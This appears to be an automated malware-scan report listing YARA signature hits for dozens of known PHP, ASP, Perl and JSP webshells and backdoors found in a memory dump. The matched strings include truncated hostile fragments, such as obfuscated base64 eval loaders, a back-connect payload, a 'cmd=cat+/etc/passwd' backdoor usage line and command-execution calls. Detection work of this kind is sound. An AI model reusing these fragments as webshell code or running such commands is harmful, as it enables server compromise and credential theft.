00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | klasvayv_asp | Semi-Auto-generated - file klasvayv.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x31f7f:$s1: set aktifklas=request.querystring("aktifklas")
- 0x31fb2:$s2: action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>
- 0x32003:$s3: <font color="#858585">www.aventgrup.net
- 0x3202f:$s4: style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | rst_sql_php_php | Semi-Auto-generated - file rst_sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32273:$s0: C:\tmp\dump_
- 0x32284:$s1: RST MySQL
- 0x379ce:$s1: RST MySQL
- 0x32292:$s2: http://rst.void.ru
- 0x379ee:$s2: http://rst.void.ru
- 0x37a0a:$s2: http://rst.void.ru
- 0x322a9:$s3: $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | wh_bindshell_py | Semi-Auto-generated - file wh_bindshell.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x323bb:$s0: #Use: python wh_bindshell.py [port] [password]
- 0x323ee:$s2: python -c"import md5;x=md5.new('you_password');print x.hexdigest()"
- 0x32436:$s3: #bugz: ctrl+c etc =script stoped=
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | lurm_safemod_on_cgi | Semi-Auto-generated - file lurm_safemod_on.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32516:$s0: Network security team :: CGI Shell
- 0x3253d:$s1: #########################<<KONEC>>#####################################
- 0x32589:$s2: ##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | c99madshell_v2_0_php_php | Semi-Auto-generated - file c99madshell_v2.0.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3268d:$s2: eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | backupsql_php_often_with_c99shell | Semi-Auto-generated - file backupsql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x327a8:$s2: //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" .
- 0x327f6:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x42a47:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | uploader_php_php | Semi-Auto-generated - file uploader.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x328fe:$s2: move_uploaded_file($userfile, "entrika.php");
- 0x41385:$s2: move_uploaded_file($userfile, "entrika.php");
- 0x32931:$s3: Send this file: <INPUT NAME="userfile" TYPE="file">
- 0x32969:$s4: <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | telnet_pl | Semi-Auto-generated - file telnet.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32a4d:$s0: W A R N I N G: Private Server
- 0x384ae:$s0: W A R N I N G: Private Server
- 0x32a6f:$s2: $Message = q$<pre><font color="#669999"> _____ _____ _____ _____
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | w3d_php_php | Semi-Auto-generated - file w3d.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32b6c:$s0: W3D Shell
- 0x32b7a:$s1: By: Warpboy
- 0x32b8a:$s2: No Query Executed
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_cgi | Semi-Auto-generated - file WebShell.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32bd1:$s0: WebShell.cgi
- 0x32c4c:$s0: WebShell.cgi
- 0x32c5d:$s2: <td><code class="entry-[% if entry.all_rights %]mine[% else
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WinX_Shell_html | Semi-Auto-generated - file WinX Shell.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2366b:$s0: WinX Shell
- 0x32cd1:$s0: WinX Shell
- 0x32d4f:$s0: WinX Shell
- 0x4477a:$s0: WinX Shell
- 0x4489a:$s0: WinX Shell
- 0x32d5e:$s1: Created by greenwood from n57
- 0x448bc:$s1: Created by greenwood from n57
- 0x32d80:$s2: <td><font color=\"#990000\">Win Dir:</font></td>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Dx_php_php | Semi-Auto-generated - file Dx.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x1f2e4:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x32e5d:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x356b0:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x32eac:$s2: $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util
- 0x32f01:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | csh_php_php | Semi-Auto-generated - file csh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32ffc:$s0: .::[c0derz]::. web-shell
- 0x33019:$s1: http://c0derz.org.ua
- 0x33032:$s2: vint21h@c0derz.org.ua
- 0x3304c:$s3: $name='63a9f0ea7bb98050796b649e85481845';//root
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | pHpINJ_php_php | Semi-Auto-generated - file pHpINJ.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33130:$s1: News Remote PHP Shell Injection
- 0x33154:$s3: Php Shell <br />
- 0x402ec:$s3: Php Shell <br />
- 0x33169:$s4: <input type = "text" name = "url" value = "
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | sig_2008_php_php | Semi-Auto-generated - file 2008.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33249:$s0: Codz by angel(4ngel)
- 0x33262:$s1: Web: http://www.4ngel.net
- 0x33280:$s2: $admin['cookielife'] = 86400;
- 0x332a2:$s3: $errmsg = 'The file you want Downloadable was nonexistent';
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ak74shell_php_php | Semi-Auto-generated - file ak74shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33398:$s1: $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION[
- 0x333e9:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x42c66:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x333bf:$s3: $xshell
- 0x3341d:$s3: $xshell
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Rem_View_php_php | Semi-Auto-generated - file Rem View.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x334dd:$s0: $php="/* line 1 */\n\n// ".mm("for example, uncomment next line")."
- 0x1be12:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x33525:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x33576:$s4: Welcome to phpRemoteView (RemView)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Java_Shell_js | Semi-Auto-generated - file Java Shell.js.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3364b:$s2: PySystemState.initialize(System.getProperties(), null, argv);
- 0x3368d:$s3: public class JythonShell extends JPanel implements Runnable {
- 0x336cf:$s4: public static int DEFAULT_SCROLLBACK = 100
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | STNC_php_php | Semi-Auto-generated - file STNC.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x337aa:$s0: drmist.ru
- 0x337b8:$s1: hidden("action","download").hidden_pwd()."<center><table><tr><td width=80
- 0x33806:$s2: STNC WebShell
- 0x43303:$s2: STNC WebShell
- 0x33818:$s3: http://www.security-teams.net/index.php?showtopic=
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | aZRaiLPhp_v1_0_php | Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33907:$s0: azrailphp
- 0x33915:$s1: <br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>
- 0x33963:$s3: <center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Moroccan_Spamers_Ma_EditioN_By_GhOsT_php | Semi-Auto-generated - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33a8c:$s0: ;$sd98="john.barker446@gmail.com"
- 0x33ab2:$s1: print "Sending mail to $to....... ";
- 0x4218d:$s1: print "Sending mail to $to....... ";
- 0x33adb:$s2: <td colspan="2" width="715" background="/simparts/images/cellpic1.gif" hei
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | zacosmall_php | Semi-Auto-generated - file zacosmall.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32f0a:$s0: rand(1,99999);$sj98
- 0x33bd8:$s0: rand(1,99999);$sj98
- 0x36151:$s0: rand(1,99999);$sj98
- 0x3738e:$s0: rand(1,99999);$sj98
- 0x454ac:$s0: rand(1,99999);$sj98
- 0x33bf0:$s1: $dump_file.='`'.$rows2[0].'`
- 0x33c11:$s3: filename=\"dump_{$db_dump}_${table_d
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | CmdAsp_asp | Semi-Auto-generated - file CmdAsp.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33c69:$s0: CmdAsp.asp
- 0x33ce2:$s0: CmdAsp.asp
- 0x423c6:$s0: CmdAsp.asp
- 0x42520:$s0: CmdAsp.asp
- 0x42534:$s0: CmdAsp.asp
- 0x4a9bd:$s0: CmdAsp.asp
- 0x1c4d6:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x33cf1:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x33d36:$s2: -- Use a poor man's pipe ... a temp file --
- 0x424b4:$s2: -- Use a poor man's pipe ... a temp file --
- 0x33d66:$s3: maceo @ dogmile.com
- 0x42499:$s3: maceo @ dogmile.com
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | simple_backdoor_php | Semi-Auto-generated - file simple-backdoor.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x22597:$s0: $cmd = ($_REQUEST['cmd']);
- 0x33e38:$s0: $cmd = ($_REQUEST['cmd']);
- 0x4191e:$s0: $cmd = ($_REQUEST['cmd']);
- 0x33e57:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41847:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41f6e:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x33e96:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x418b6:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x41fdd:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | mysql_shell_php | Semi-Auto-generated - file mysql_shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33f8d:$s0: SooMin Kim
- 0x38ec0:$s0: SooMin Kim
- 0x33f9c:$s1: smkim@popeye.snu.ac.kr
- 0x33fb7:$s2: echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Dive_Shell_1_0___Emperor_Hacking_Team_php | Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x340f1:$s0: Emperor Hacking TEAM
- 0x3410a:$s1: Simshell
- 0x34986:$s1: Simshell
- 0x29b4a:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x34117:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x349a1:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x383c2:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x3413c:$s3: <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Asmodeus_v0_1_pl | Semi-Auto-generated - file Asmodeus v0.1.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34240:$s0: [url=http://www.governmentsecurity.org
- 0x3426b:$s1: perl asmodeus.pl client 6666 127.0.0.1
- 0x34296:$s2: print "Asmodeus Perl Remote Shell
- 0x342bc:$s4: $internet_addr = inet_aton("$host") or die "ALOA:$!\n";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | backup_php_often_with_c99shell | Semi-Auto-generated - file backup.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x343b8:$s0: #phpMyAdmin MySQL-Dump
- 0x343d3:$s2: ;db_connect();header('Content-Type: application/octetstr
- 0x34410:$s4: $data .= "#Database: $database
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Reader_asp | Semi-Auto-generated - file Reader.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x344db:$s1: Mehdi & HolyDemon
- 0x344f1:$s2: www.infilak.
- 0x34502:$s3: '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpshell17_php | Semi-Auto-generated - file phpshell17.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x1b56f:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x34605:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x52c98:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x3464d:$s1: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></
- 0x346a2:$s2: href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | myshell_php_php | Semi-Auto-generated - file myshell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x347a0:$s0: @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.
- 0x347eb:$s1: echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color
- 0x3483b:$s2: $fileEditInfo = " ::::::: Owner: <font color=$
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SimShell_1_0___Simorgh_Security_MGZ_php | Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34967:$s0: Simorgh Security Magazine
- 0x34986:$s1: Simshell.css
- 0x34997:$s2: } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'],
- 0x349e8:$s3: www.simorgh-ev.com
- 0x3ef78:$s3: www.simorgh-ev.com
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | jspshall_jsp | Semi-Auto-generated - file jspshall.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34aab:$s0: kj021320
- 0x34ab8:$s1: case 'T':systemTools(out);break;
- 0x34add:$s2: out.println("<tr><td>"+ico(50)+f[i].getName()+"</td><td> file
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | rootshell_php | Semi-Auto-generated - file rootshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34cbc:$s0: shells.dl.am
- 0x34ccd:$s1: This server has been infected by $owner
- 0x34cf9:$s2: <input type="submit" value="Include!" name="inc"></p>
- 0x34d33:$s4: Could not write to file! (Maybe you didn't enter any text?)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | connectback2_pl | Semi-Auto-generated - file connectback2.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34e25:$s0: #We Are: MasterKid, AleXutz, FatMan & MiKuTuL
- 0x34e7a:$s1: echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel
- 0x34ecf:$s2: ConnectBack Backdoor
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DefaceKeeper_0_2_php | Semi-Auto-generated - file DefaceKeeper_0.2.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34fa4:$s0: target fi1e:<br><input type="text" name="target" value="index.php"></br>
- 0x34ff1:$s1: eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9
- 0x35045:$s2: <img src="http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png" align="center
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shells_PHP_wso | Semi-Auto-generated - file wso.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3513b:$s0: $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi
- 0x3518f:$s3: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | backdoor1_php | Semi-Auto-generated - file backdoor1.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3528e:$s1: echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."..
- 0x352d9:$s2: class backdoor {
- 0x352ee:$s4: echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | elmaliseker_asp | Semi-Auto-generated - file elmaliseker.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x353ee:$s0: if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "."
- 0x3543f:$s1: <form name=frmCMD method=post action="<%=gURL%>">
- 0x35475:$s2: dim zombie_array,special_array
- 0x35498:$s3: http://vnhacker.org
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | indexer_asp | Semi-Auto-generated - file indexer.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x24c9d:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3555a:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x4c686:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x355ab:$s2: D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DxShell_php_php | Semi-Auto-generated - file DxShell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x1f2e4:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x32e5d:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x356b0:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x356ff:$s2: print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | s72_Shell_v1_1_Coding_html | Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x35819:$s0: Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><
- 0x35862:$s1: s72 Shell v1.0 Codinf by Cr@zy_King
- 0x3588a:$s3: echo "<p align=center>Dosya Zaten Bulunuyor</p>"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hidshell_php_php | Semi-Auto-generated - file hidshell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x35973:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x40a64:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | kacak_asp | Semi-Auto-generated - file kacak.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x35a6e:$s0: Kacak FSO 1.0
- 0x35a80:$s1: if request.querystring("TGH") = "1" then
- 0x35aad:$s3: <font color="#858585">BuqX</font></a></font><font face="Verdana" style=
- 0x35af9:$s4: mailto:BuqX@hotmail.com
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_Backdoor_Connect_pl_php | Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x35bdf:$s0: LorD of IRAN HACKERS SABOTAGE
- 0x35c01:$s1: LorD-C0d3r-NT
- 0x34e7a:$s2: echo --==Userinfo==-- ;
- 0x35c13:$s2: echo --==Userinfo==-- ;
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Antichat_Socks5_Server_php_php | Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x35cff:$s0: $port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);
- 0x35d54:$s3: # [+] Domain name address type
- 0x35d79:$s4: www.antichat.ru
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Antichat_Shell_v1_3_php | Semi-Auto-generated - file Antichat Shell v1.3.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x22897:$s0: Antichat
- 0x228ca:$s0: Antichat
- 0x229a4:$s0: Antichat
- 0x35c2b:$s0: Antichat
- 0x35c72:$s0: Antichat
- 0x35d89:$s0: Antichat
- 0x35dc9:$s0: Antichat
- 0x35e4f:$s0: Antichat
- 0x35e5c:$s1: Can't open file, permission denide
- 0x32f01:$s2: $ra44
- 0x32f24:$s2: $ra44
- 0x35e83:$s2: $ra44
- 0x36148:$s2: $ra44
- 0x3616b:$s2: $ra44
- 0x37385:$s2: $ra44
- 0x373a8:$s2: $ra44
- 0x454a3:$s2: $ra44
- 0x454c6:$s2: $ra44
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php | Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x1b993:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x35f79:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x1b9de:$s1: Mode Shell v1.0</font></span>
- 0x35fc2:$s1: Mode Shell v1.0</font></span>
- 0x35fe4:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
- 0x3f9b5:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | mysql_php_php | Semi-Auto-generated - file mysql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x360c9:$s0: action=mysqlread&mass=loadmass">load all defaults
- 0x360ff:$s2: if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru
- 0x32f01:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x36148:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x37385:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x454a3:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Worse_Linux_Shell_php | Semi-Auto-generated - file Worse Linux Shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36249:$s1: print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td
- 0x3629b:$s2: print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | cyberlords_sql_php_php | Semi-Auto-generated - file cyberlords_sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x363aa:$s0: Coded by n0 [nZer0]
- 0x363c2:$s1: www.cyberlords.net
- 0x363da:$s2: U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE
- 0x3642b:$s3: return "<BR>Dump error! Can't write to ".htmlspecialchars($file);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | cmd_asp_5_1_asp | Semi-Auto-generated - file cmd-asp-5.1.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36523:$s0: Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
- 0x1e6e1:$s3: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
- 0x3655b:$s3: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | pws_php_php | Semi-Auto-generated - file pws.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36646:$s0: <div align="left"><font size="1">Input command :</font></div>
- 0x36688:$s1: <input type="text" name="cmd" size="30" class="input"><br>
- 0x366c7:$s4: <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_Shell_php_php | Semi-Auto-generated - file PHP Shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x20d54:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x367c7:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x22847:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x36813:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html | Semi-Auto-generated - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3685a:$s0: Ayyildiz
- 0x368ab:$s0: Ayyildiz
- 0x36942:$s0: Ayyildiz
- 0x43dda:$s0: Ayyildiz
- 0x43e2e:$s0: Ayyildiz
- 0x56e3b:$s0: Ayyildiz
- 0x3694f:$s1: TouCh By iJOo
- 0x43ef3:$s1: TouCh By iJOo
- 0x36961:$s2: First we check if there has been asked for a working directory
- 0x369a4:$s3: http://ayyildiz.org/images/whosonline2.gif
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | EFSO_2_asp | Semi-Auto-generated - file EFSO_2.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36a7b:$s0: Ejder was HERE
- 0x36a8e:$s1: *~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | lamashell_php | Semi-Auto-generated - file lamashell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36b91:$s0: lama's'hell
- 0x41e2f:$s0: lama's'hell
- 0x36ba1:$s1: if($_POST['king'] == "") {
- 0x36bc0:$s2: if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['f
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Ajax_PHP_Command_Shell_php | Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36cd7:$s1: newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>
- 0x36d2c:$s2: Empty Command..type \"shellhelp\" for some ehh...help
